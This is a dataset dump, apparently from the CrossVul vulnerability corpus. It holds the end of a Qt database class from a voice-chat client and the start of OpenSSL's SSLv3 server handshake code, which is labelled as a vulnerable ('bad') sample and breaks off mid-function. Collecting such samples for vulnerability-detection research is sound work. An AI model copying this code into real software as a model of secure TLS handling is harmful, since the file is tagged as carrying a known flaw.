query.prepare(QLatin1String("INSERT INTO `shortcut` (`digest`, `shortcut`, `target`, `suppress`) VALUES (?,?,?,?)"));
foreach(const Shortcut &sc, scs) {
if (sc.isServerSpecific()) {
shortcuts.removeAll(sc);
updated = true;
query.addBindValue(digest);
QByteArray a;
{
QDataStream s(&a, QIODevice::WriteOnly);
s.setVersion(QDataStream::Qt_4_0);
s << sc.qlButtons;
}
query.addBindValue(a);
a.clear();
{
QDataStream s(&a, QIODevice::WriteOnly);
s.setVersion(QDataStream::Qt_4_0);
s << sc.qvData;
}
query.addBindValue(a);
query.addBindValue(sc.bSuppress);
query.exec();
}
}
return updated;
}
const QMap<QString, QString> Database::getFriends() {
QMap<QString, QString> qm;
QSqlQuery query;
query.prepare(QLatin1String("SELECT `name`, `hash` FROM `friends`"));
query.exec();
while (query.next())
qm.insert(query.value(0).toString(), query.value(1).toString());
return qm;
}
const QString Database::getFriend(const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `name` FROM `friends` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
if (query.next())
return query.value(0).toString();
return QString();
}
void Database::addFriend(const QString &name, const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `friends` (`name`, `hash`) VALUES (?,?)"));
query.addBindValue(name);
query.addBindValue(hash);
query.exec();
}
void Database::removeFriend(const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("DELETE FROM `friends` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
}
const QString Database::getDigest(const QString &hostname, unsigned short port) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `digest` FROM `cert` WHERE `hostname` = ? AND `port` = ?"));
query.addBindValue(hostname);
query.addBindValue(port);
query.exec();
if (query.next()) {
return query.value(0).toString();
}
return QString();
}
void Database::setDigest(const QString &hostname, unsigned short port, const QString &digest) {
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `cert` (`hostname`,`port`,`digest`) VALUES (?,?,?)"));
query.addBindValue(hostname);
query.addBindValue(port);
query.addBindValue(digest);
query.exec();
}
void Database::setPassword(const QString &hostname, unsigned short port, const QString &uname, const QString &pw) {
QSqlQuery query;
query.prepare(QLatin1String("UPDATE `servers` SET `password` = ? WHERE `hostname` = ? AND `port` = ? AND `username` = ?"));
query.addBindValue(pw);
query.addBindValue(hostname);
query.addBindValue(port);
query.addBindValue(uname);
query.exec();
}
bool Database::getUdp(const QByteArray &digest) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT COUNT(*) FROM `udp` WHERE `digest` = ? "));
query.addBindValue(digest);
query.exec();
if (query.next()) {
return (query.value(0).toInt() == 0);
}
return true;
}
void Database::setUdp(const QByteArray &digest, bool udp) {
QSqlQuery query;
if (! udp)
query.prepare(QLatin1String("REPLACE INTO `udp` (`digest`) VALUES (?)"));
else
query.prepare(QLatin1String("DELETE FROM `udp` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
}
bool Database::fuzzyMatch(QString &name, QString &user, QString &pw, QString &hostname, unsigned short port) {
QSqlQuery query;
if (! user.isEmpty()) {
query.prepare(QLatin1String("SELECT `username`, `password`, `hostname`, `name` FROM `servers` WHERE `username` LIKE ? AND `hostname` LIKE ? AND `port`=?"));
query.addBindValue(user);
} else {
query.prepare(QLatin1String("SELECT `username`, `password`, `hostname`, `name` FROM `servers` WHERE `hostname` LIKE ? AND `port`=?"));
}
query.addBindValue(hostname);
query.addBindValue(port);
query.exec();
if (query.next()) {
user = query.value(0).toString();
if (pw.isEmpty())
pw = query.value(1).toString();
hostname = query.value(2).toString();
if (name.isEmpty())
name = query.value(3).toString();
return true;
} else {
return false;
}
}
| ./CrossVul/dataset_final_sorted/CWE-310/cpp/good_3579_0 |
crossvul-cpp_data_bad_1445_5 | /* ssl/s3_srvr.c -*- mode:C; c-file-style: "eay" -*- */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
/* ====================================================================
* Copyright (c) 1998-2007 The OpenSSL Project. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* 3. All advertising materials mentioning features or use of this
* software must display the following acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
*
* 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
* endorse or promote products derived from this software without
* prior written permission. For written permission, please contact
* openssl-core@openssl.org.
*
* 5. Products derived from this software may not be called "OpenSSL"
* nor may "OpenSSL" appear in their names without prior written
* permission of the OpenSSL Project.
*
* 6. Redistributions of any form whatsoever must retain the following
* acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit (http://www.openssl.org/)"
*
* THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
* EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR
* ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
* STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
* OF THE POSSIBILITY OF SUCH DAMAGE.
* ====================================================================
*
* This product includes cryptographic software written by Eric Young
* (eay@cryptsoft.com). This product includes software written by Tim
* Hudson (tjh@cryptsoft.com).
*
*/
/* ====================================================================
* Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
*
* Portions of the attached software ("Contribution") are developed by
* SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
*
* The Contribution is licensed pursuant to the OpenSSL open source
* license provided above.
*
* ECC cipher suite support in OpenSSL originally written by
* Vipul Gupta and Sumit Gupta of Sun Microsystems Laboratories.
*
*/
/* ====================================================================
* Copyright 2005 Nokia. All rights reserved.
*
* The portions of the attached software ("Contribution") is developed by
* Nokia Corporation and is licensed pursuant to the OpenSSL open source
* license.
*
* The Contribution, originally written by Mika Kousa and Pasi Eronen of
* Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
* support (see RFC 4279) to OpenSSL.
*
* No patent licenses or other rights except those expressly stated in
* the OpenSSL open source license shall be deemed granted or received
* expressly, by implication, estoppel, or otherwise.
*
* No assurances are provided by Nokia that the Contribution does not
* infringe the patent or other intellectual property rights of any third
* party or that the license provides you with all the necessary rights
* to make use of the Contribution.
*
* THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
* ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
* SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
* OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
* OTHERWISE.
*/
#define REUSE_CIPHER_BUG
#define NETSCAPE_HANG_BUG
#include <stdio.h>
#include "ssl_locl.h"
#include "kssl_lcl.h"
#include "../crypto/constant_time_locl.h"
#include <openssl/buffer.h>
#include <openssl/rand.h>
#include <openssl/objects.h>
#include <openssl/evp.h>
#include <openssl/hmac.h>
#include <openssl/x509.h>
#ifndef OPENSSL_NO_DH
#include <openssl/dh.h>
#endif
#include <openssl/bn.h>
#ifndef OPENSSL_NO_KRB5
#include <openssl/krb5_asn.h>
#endif
#include <openssl/md5.h>
#ifndef OPENSSL_NO_SSL3_METHOD
static const SSL_METHOD *ssl3_get_server_method(int ver);
static const SSL_METHOD *ssl3_get_server_method(int ver)
{
if (ver == SSL3_VERSION)
return(SSLv3_server_method());
else
return(NULL);
}
IMPLEMENT_ssl3_meth_func(SSLv3_server_method,
ssl3_accept,
ssl_undefined_function,
ssl3_get_server_method)
#endif
#ifndef OPENSSL_NO_SRP
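/* Check the SRP username extension received in the ClientHello: when an
 * SRP cipher suite was negotiated and a username callback is installed,
 * reject the handshake if no SRP login name was supplied, otherwise look
 * up the server-side SRP parameters for that user. */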
static int ssl_check_srp_ext_ClientHello(SSL *s, int *al)
{
int ret = SSL_ERROR_NONE;
*al = SSL_AD_UNRECOGNIZED_NAME;
if ((s->s3->tmp.new_cipher->algorithm_mkey & SSL_kSRP) &&
(s->srp_ctx.TLS_ext_srp_username_callback != NULL))
{
if(s->srp_ctx.login == NULL)
{
/* RFC 5054 says we SHOULD reject the handshake;
we do so if there is no SRP login name */
ret = SSL3_AL_FATAL;
*al = SSL_AD_UNKNOWN_PSK_IDENTITY;
}
else
{
ret = SSL_srp_server_param_with_username(s,al);
}
}
return ret;
}
#endif
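/* Server-side SSLv3/TLS handshake state machine: each iteration of the
 * loop below handles one handshake state and advances s->state until the
 * handshake completes or an error occurs. */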
int ssl3_accept(SSL *s)
{
BUF_MEM *buf;
unsigned long alg_k,Time=(unsigned long)time(NULL);
void (*cb)(const SSL *ssl,int type,int val)=NULL;
int ret= -1;
int new_state,state,skip=0;
RAND_add(&Time,sizeof(Time),0);
ERR_clear_error();
clear_sys_error();
if (s->info_callback != NULL)
cb=s->info_callback;
else if (s->ctx->info_callback != NULL)
cb=s->ctx->info_callback;
/* init things to blank */
s->in_handshake++;
if (!SSL_in_init(s) || SSL_in_before(s)) SSL_clear(s);
if (s->cert == NULL)
{
SSLerr(SSL_F_SSL3_ACCEPT,SSL_R_NO_CERTIFICATE_SET);
return(-1);
}
#ifndef OPENSSL_NO_HEARTBEATS
/* If we're awaiting a HeartbeatResponse, pretend we
* already got it and don't await it anymore, because
* Heartbeats don't make sense during handshakes anyway.
*/
if (s->tlsext_hb_pending)
{
s->tlsext_hb_pending = 0;
s->tlsext_hb_seq++;
}
#endif
for (;;)
{
state=s->state;
switch (s->state)
{
case SSL_ST_RENEGOTIATE:
s->renegotiate=1;
/* s->state=SSL_ST_ACCEPT; */
case SSL_ST_BEFORE:
case SSL_ST_ACCEPT:
case SSL_ST_BEFORE|SSL_ST_ACCEPT:
case SSL_ST_OK|SSL_ST_ACCEPT:
s->server=1;
if (cb != NULL) cb(s,SSL_CB_HANDSHAKE_START,1);
if ((s->version>>8) != 3)
{
SSLerr(SSL_F_SSL3_ACCEPT, ERR_R_INTERNAL_ERROR);
return -1;
}
if (!ssl_security(s, SSL_SECOP_VERSION, 0,
s->version, NULL))
{
SSLerr(SSL_F_SSL3_ACCEPT, SSL_R_VERSION_TOO_LOW);
return -1;
}
s->type=SSL_ST_ACCEPT;
if (s->init_buf == NULL)
{
if ((buf=BUF_MEM_new()) == NULL)
{
ret= -1;
goto end;
}
if (!BUF_MEM_grow(buf,SSL3_RT_MAX_PLAIN_LENGTH))
{
BUF_MEM_free(buf);
ret= -1;
goto end;
}
s->init_buf=buf;
}
if (!ssl3_setup_buffers(s))
{
ret= -1;
goto end;
}
s->init_num=0;
s->s3->flags &= ~TLS1_FLAGS_SKIP_CERT_VERIFY;
s->s3->flags &= ~SSL3_FLAGS_CCS_OK;
/* Should have been reset by ssl3_get_finished, too. */
s->s3->change_cipher_spec = 0;
if (s->state != SSL_ST_RENEGOTIATE)
{
/* Ok, we now need to push on a buffering BIO so that
* the output is sent in a way that TCP likes :-)
*/
if (!ssl_init_wbio_buffer(s,1)) { ret= -1; goto end; }
ssl3_init_finished_mac(s);
s->state=SSL3_ST_SR_CLNT_HELLO_A;
s->ctx->stats.sess_accept++;
}
else if (!s->s3->send_connection_binding &&
!(s->options & SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION))
{
/* Server attempting to renegotiate with
* client that doesn't support secure
* renegotiation.
*/
SSLerr(SSL_F_SSL3_ACCEPT, SSL_R_UNSAFE_LEGACY_RENEGOTIATION_DISABLED);
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_HANDSHAKE_FAILURE);
ret = -1;
goto end;
}
else
{
/* s->state == SSL_ST_RENEGOTIATE,
* we will just send a HelloRequest */
s->ctx->stats.sess_accept_renegotiate++;
s->state=SSL3_ST_SW_HELLO_REQ_A;
}
break;
case SSL3_ST_SW_HELLO_REQ_A:
case SSL3_ST_SW_HELLO_REQ_B:
s->shutdown=0;
ret=ssl3_send_hello_request(s);
if (ret <= 0) goto end;
s->s3->tmp.next_state=SSL3_ST_SW_HELLO_REQ_C;
s->state=SSL3_ST_SW_FLUSH;
s->init_num=0;
ssl3_init_finished_mac(s);
break;
case SSL3_ST_SW_HELLO_REQ_C:
s->state=SSL_ST_OK;
break;
case SSL3_ST_SR_CLNT_HELLO_A:
case SSL3_ST_SR_CLNT_HELLO_B:
case SSL3_ST_SR_CLNT_HELLO_C:
ret=ssl3_get_client_hello(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_SRP
s->state = SSL3_ST_SR_CLNT_HELLO_D;
case SSL3_ST_SR_CLNT_HELLO_D:
{
int al;
if ((ret = ssl_check_srp_ext_ClientHello(s,&al)) < 0)
{
/* callback indicates further work to be done */
s->rwstate=SSL_X509_LOOKUP;
goto end;
}
if (ret != SSL_ERROR_NONE)
{
ssl3_send_alert(s,SSL3_AL_FATAL,al);
/* This is not really an error, but the only means
for a client to detect whether SRP is supported. */
if (al != TLS1_AD_UNKNOWN_PSK_IDENTITY)
SSLerr(SSL_F_SSL3_ACCEPT,SSL_R_CLIENTHELLO_TLSEXT);
ret = SSL_TLSEXT_ERR_ALERT_FATAL;
ret= -1;
goto end;
}
}
#endif
s->renegotiate = 2;
s->state=SSL3_ST_SW_SRVR_HELLO_A;
s->init_num=0;
break;
case SSL3_ST_SW_SRVR_HELLO_A:
case SSL3_ST_SW_SRVR_HELLO_B:
ret=ssl3_send_server_hello(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_TLSEXT
if (s->hit)
{
if (s->tlsext_ticket_expected)
s->state=SSL3_ST_SW_SESSION_TICKET_A;
else
s->state=SSL3_ST_SW_CHANGE_A;
}
#else
if (s->hit)
s->state=SSL3_ST_SW_CHANGE_A;
#endif
else
s->state = SSL3_ST_SW_CERT_A;
s->init_num = 0;
break;
case SSL3_ST_SW_CERT_A:
case SSL3_ST_SW_CERT_B:
/* Check if it is anon DH or anon ECDH, */
/* normal PSK or KRB5 or SRP */
if (!(s->s3->tmp.new_cipher->algorithm_auth & (SSL_aNULL|SSL_aKRB5|SSL_aSRP))
&& !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK))
{
ret=ssl3_send_server_certificate(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_TLSEXT
if (s->tlsext_status_expected)
s->state=SSL3_ST_SW_CERT_STATUS_A;
else
s->state=SSL3_ST_SW_KEY_EXCH_A;
}
else
{
skip = 1;
s->state=SSL3_ST_SW_KEY_EXCH_A;
}
#else
}
else
skip=1;
s->state=SSL3_ST_SW_KEY_EXCH_A;
#endif
s->init_num=0;
break;
case SSL3_ST_SW_KEY_EXCH_A:
case SSL3_ST_SW_KEY_EXCH_B:
alg_k = s->s3->tmp.new_cipher->algorithm_mkey;
/* clear this, it may get reset by
* send_server_key_exchange */
if ((s->options & SSL_OP_EPHEMERAL_RSA)
#ifndef OPENSSL_NO_KRB5
&& !(alg_k & SSL_kKRB5)
#endif /* OPENSSL_NO_KRB5 */
)
/* option SSL_OP_EPHEMERAL_RSA sends temporary RSA key
* even when forbidden by protocol specs
* (handshake may fail as clients are not required to
* be able to handle this) */
s->s3->tmp.use_rsa_tmp=1;
else
s->s3->tmp.use_rsa_tmp=0;
/* only send a ServerKeyExchange for a DH key exchange, Fortezza, or
* RSA when we only have a sign-only certificate
*
* PSK: may send PSK identity hints
*
* For ECC ciphersuites, we send a serverKeyExchange
* message only if the cipher suite is either
* ECDH-anon or ECDHE. In other cases, the
* server certificate contains the server's
* public key for key exchange.
*/
if (s->s3->tmp.use_rsa_tmp
/* PSK: send ServerKeyExchange if a PSK identity
* hint is provided */
#ifndef OPENSSL_NO_PSK
|| ((alg_k & SSL_kPSK) && s->ctx->psk_identity_hint)
#endif
#ifndef OPENSSL_NO_SRP
/* SRP: send ServerKeyExchange */
|| (alg_k & SSL_kSRP)
#endif
|| (alg_k & SSL_kDHE)
|| (alg_k & SSL_kECDHE)
|| ((alg_k & SSL_kRSA)
&& (s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey == NULL
|| (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher)
&& EVP_PKEY_size(s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey)*8 > SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher)
)
)
)
)
{
ret=ssl3_send_server_key_exchange(s);
if (ret <= 0) goto end;
}
else
skip=1;
s->state=SSL3_ST_SW_CERT_REQ_A;
s->init_num=0;
break;
case SSL3_ST_SW_CERT_REQ_A:
case SSL3_ST_SW_CERT_REQ_B:
if (/* don't request cert unless asked for it: */
!(s->verify_mode & SSL_VERIFY_PEER) ||
/* if SSL_VERIFY_CLIENT_ONCE is set,
* don't request cert during re-negotiation: */
((s->session->peer != NULL) &&
(s->verify_mode & SSL_VERIFY_CLIENT_ONCE)) ||
/* never request cert in anonymous ciphersuites
* (see section "Certificate request" in SSL 3 drafts
* and in RFC 2246): */
((s->s3->tmp.new_cipher->algorithm_auth & SSL_aNULL) &&
/* ... except when the application insists on verification
* (against the specs, but s3_clnt.c accepts this for SSL 3) */
!(s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT)) ||
/* never request cert in Kerberos ciphersuites */
(s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5) ||
/* don't request certificate for SRP auth */
(s->s3->tmp.new_cipher->algorithm_auth & SSL_aSRP)
/* With normal PSK Certificates and
* Certificate Requests are omitted */
|| (s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK))
{
/* no cert request */
skip=1;
s->s3->tmp.cert_request=0;
s->state=SSL3_ST_SW_SRVR_DONE_A;
if (s->s3->handshake_buffer)
if (!ssl3_digest_cached_records(s))
return -1;
}
else
{
s->s3->tmp.cert_request=1;
ret=ssl3_send_certificate_request(s);
if (ret <= 0) goto end;
#ifndef NETSCAPE_HANG_BUG
s->state=SSL3_ST_SW_SRVR_DONE_A;
#else
s->state=SSL3_ST_SW_FLUSH;
s->s3->tmp.next_state=SSL3_ST_SR_CERT_A;
#endif
s->init_num=0;
}
break;
case SSL3_ST_SW_SRVR_DONE_A:
case SSL3_ST_SW_SRVR_DONE_B:
ret=ssl3_send_server_done(s);
if (ret <= 0) goto end;
s->s3->tmp.next_state=SSL3_ST_SR_CERT_A;
s->state=SSL3_ST_SW_FLUSH;
s->init_num=0;
break;
case SSL3_ST_SW_FLUSH:
/* This code originally checked to see if
* any data was pending using BIO_CTRL_INFO
* and then flushed. This caused problems
* as documented in PR#1939. The proposed
* fix doesn't completely resolve this issue
* as buggy implementations of BIO_CTRL_PENDING
* still exist. So instead we just flush
* unconditionally.
*/
s->rwstate=SSL_WRITING;
if (BIO_flush(s->wbio) <= 0)
{
ret= -1;
goto end;
}
s->rwstate=SSL_NOTHING;
s->state=s->s3->tmp.next_state;
break;
case SSL3_ST_SR_CERT_A:
case SSL3_ST_SR_CERT_B:
if (s->s3->tmp.cert_request)
{
ret=ssl3_get_client_certificate(s);
if (ret <= 0) goto end;
}
s->init_num=0;
s->state=SSL3_ST_SR_KEY_EXCH_A;
break;
case SSL3_ST_SR_KEY_EXCH_A:
case SSL3_ST_SR_KEY_EXCH_B:
ret=ssl3_get_client_key_exchange(s);
if (ret <= 0)
goto end;
if (ret == 2)
{
/* For the ECDH ciphersuites when
* the client sends its ECDH pub key in
* a certificate, the CertificateVerify
* message is not sent.
* Also for GOST ciphersuites when
* the client uses its key from the certificate
* for key exchange.
*/
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->state=SSL3_ST_SR_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
s->state=SSL3_ST_SR_NEXT_PROTO_A;
else
s->state=SSL3_ST_SR_FINISHED_A;
#endif
s->init_num = 0;
}
else if (SSL_USE_SIGALGS(s))
{
s->state=SSL3_ST_SR_CERT_VRFY_A;
s->init_num=0;
if (!s->session->peer)
break;
/* For sigalgs freeze the handshake buffer
* at this point and digest cached records.
*/
if (!s->s3->handshake_buffer)
{
SSLerr(SSL_F_SSL3_ACCEPT,ERR_R_INTERNAL_ERROR);
return -1;
}
s->s3->flags |= TLS1_FLAGS_KEEP_HANDSHAKE;
if (!ssl3_digest_cached_records(s))
return -1;
}
else
{
int offset=0;
int dgst_num;
s->state=SSL3_ST_SR_CERT_VRFY_A;
s->init_num=0;
/* We need to get hashes here so if there is
* a client cert, it can be verified
* FIXME - digest processing for CertificateVerify
* should be generalized. But it is next step
*/
if (s->s3->handshake_buffer)
if (!ssl3_digest_cached_records(s))
return -1;
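/* Concatenate each cached handshake digest into cert_verify_md;
* offset tracks how many digest bytes have been written so far. */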
for (dgst_num=0; dgst_num<SSL_MAX_DIGEST;dgst_num++)
if (s->s3->handshake_dgst[dgst_num])
{
int dgst_size;
s->method->ssl3_enc->cert_verify_mac(s,EVP_MD_CTX_type(s->s3->handshake_dgst[dgst_num]),&(s->s3->tmp.cert_verify_md[offset]));
dgst_size=EVP_MD_CTX_size(s->s3->handshake_dgst[dgst_num]);
if (dgst_size < 0)
{
ret = -1;
goto end;
}
offset+=dgst_size;
}
}
break;
case SSL3_ST_SR_CERT_VRFY_A:
case SSL3_ST_SR_CERT_VRFY_B:
/*
* This *should* be the first time we enable CCS, but be
* extra careful about surrounding code changes. We need
* to set this here because we don't know if we're
* expecting a CertificateVerify or not.
*/
if (!s->s3->change_cipher_spec)
s->s3->flags |= SSL3_FLAGS_CCS_OK;
/* we should decide if we expected this one */
ret=ssl3_get_cert_verify(s);
if (ret <= 0) goto end;
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->state=SSL3_ST_SR_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
s->state=SSL3_ST_SR_NEXT_PROTO_A;
else
s->state=SSL3_ST_SR_FINISHED_A;
#endif
s->init_num=0;
break;
#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
case SSL3_ST_SR_NEXT_PROTO_A:
case SSL3_ST_SR_NEXT_PROTO_B:
/*
* Enable CCS for resumed handshakes with NPN.
* In a full handshake with NPN, we end up here through
* SSL3_ST_SR_CERT_VRFY_B, where SSL3_FLAGS_CCS_OK was
* already set. Receiving a CCS clears the flag, so take care
* not to re-enable it unconditionally here, which would permit
* duplicate CCS messages.
* s->s3->change_cipher_spec is set when a CCS is
* processed in s3_pkt.c, and remains set until
* the client's Finished message is read.
*/
if (!s->s3->change_cipher_spec)
s->s3->flags |= SSL3_FLAGS_CCS_OK;
ret=ssl3_get_next_proto(s);
if (ret <= 0) goto end;
s->init_num = 0;
s->state=SSL3_ST_SR_FINISHED_A;
break;
#endif
case SSL3_ST_SR_FINISHED_A:
case SSL3_ST_SR_FINISHED_B:
/*
* Enable CCS for resumed handshakes without NPN.
* In a full handshake, we end up here through
* SSL3_ST_SR_CERT_VRFY_B, where SSL3_FLAGS_CCS_OK was
* already set. Receiving a CCS clears the flag, so take care
* not to re-enable it unconditionally here, which would permit
* duplicate CCS messages.
* s->s3->change_cipher_spec is set when a CCS is
* processed in s3_pkt.c, and remains set until
* the client's Finished message is read.
*/
if (!s->s3->change_cipher_spec)
s->s3->flags |= SSL3_FLAGS_CCS_OK;
ret=ssl3_get_finished(s,SSL3_ST_SR_FINISHED_A,
SSL3_ST_SR_FINISHED_B);
if (ret <= 0) goto end;
if (s->hit)
s->state=SSL_ST_OK;
#ifndef OPENSSL_NO_TLSEXT
else if (s->tlsext_ticket_expected)
s->state=SSL3_ST_SW_SESSION_TICKET_A;
#endif
else
s->state=SSL3_ST_SW_CHANGE_A;
s->init_num=0;
break;
#ifndef OPENSSL_NO_TLSEXT
case SSL3_ST_SW_SESSION_TICKET_A:
case SSL3_ST_SW_SESSION_TICKET_B:
ret=ssl3_send_newsession_ticket(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_CHANGE_A;
s->init_num=0;
break;
case SSL3_ST_SW_CERT_STATUS_A:
case SSL3_ST_SW_CERT_STATUS_B:
ret=ssl3_send_cert_status(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_KEY_EXCH_A;
s->init_num=0;
break;
#endif
case SSL3_ST_SW_CHANGE_A:
case SSL3_ST_SW_CHANGE_B:
s->session->cipher=s->s3->tmp.new_cipher;
if (!s->method->ssl3_enc->setup_key_block(s))
{ ret= -1; goto end; }
ret=ssl3_send_change_cipher_spec(s,
SSL3_ST_SW_CHANGE_A,SSL3_ST_SW_CHANGE_B);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_FINISHED_A;
s->init_num=0;
if (!s->method->ssl3_enc->change_cipher_state(s,
SSL3_CHANGE_CIPHER_SERVER_WRITE))
{
ret= -1;
goto end;
}
break;
case SSL3_ST_SW_FINISHED_A:
case SSL3_ST_SW_FINISHED_B:
ret=ssl3_send_finished(s,
SSL3_ST_SW_FINISHED_A,SSL3_ST_SW_FINISHED_B,
s->method->ssl3_enc->server_finished_label,
s->method->ssl3_enc->server_finished_label_len);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_FLUSH;
if (s->hit)
{
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->s3->tmp.next_state=SSL3_ST_SR_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
{
s->s3->tmp.next_state=SSL3_ST_SR_NEXT_PROTO_A;
}
else
s->s3->tmp.next_state=SSL3_ST_SR_FINISHED_A;
#endif
}
else
s->s3->tmp.next_state=SSL_ST_OK;
s->init_num=0;
break;
case SSL_ST_OK:
/* clean a few things up */
ssl3_cleanup_key_block(s);
BUF_MEM_free(s->init_buf);
s->init_buf=NULL;
/* remove buffering on output */
ssl_free_wbio_buffer(s);
s->init_num=0;
if (s->renegotiate == 2) /* skipped if we just sent a HelloRequest */
{
s->renegotiate=0;
s->new_session=0;
ssl_update_cache(s,SSL_SESS_CACHE_SERVER);
s->ctx->stats.sess_accept_good++;
/* s->server=1; */
s->handshake_func=ssl3_accept;
if (cb != NULL) cb(s,SSL_CB_HANDSHAKE_DONE,1);
}
ret = 1;
goto end;
/* break; */
default:
SSLerr(SSL_F_SSL3_ACCEPT,SSL_R_UNKNOWN_STATE);
ret= -1;
goto end;
/* break; */
}
if (!s->s3->tmp.reuse_message && !skip)
{
if (s->debug)
{
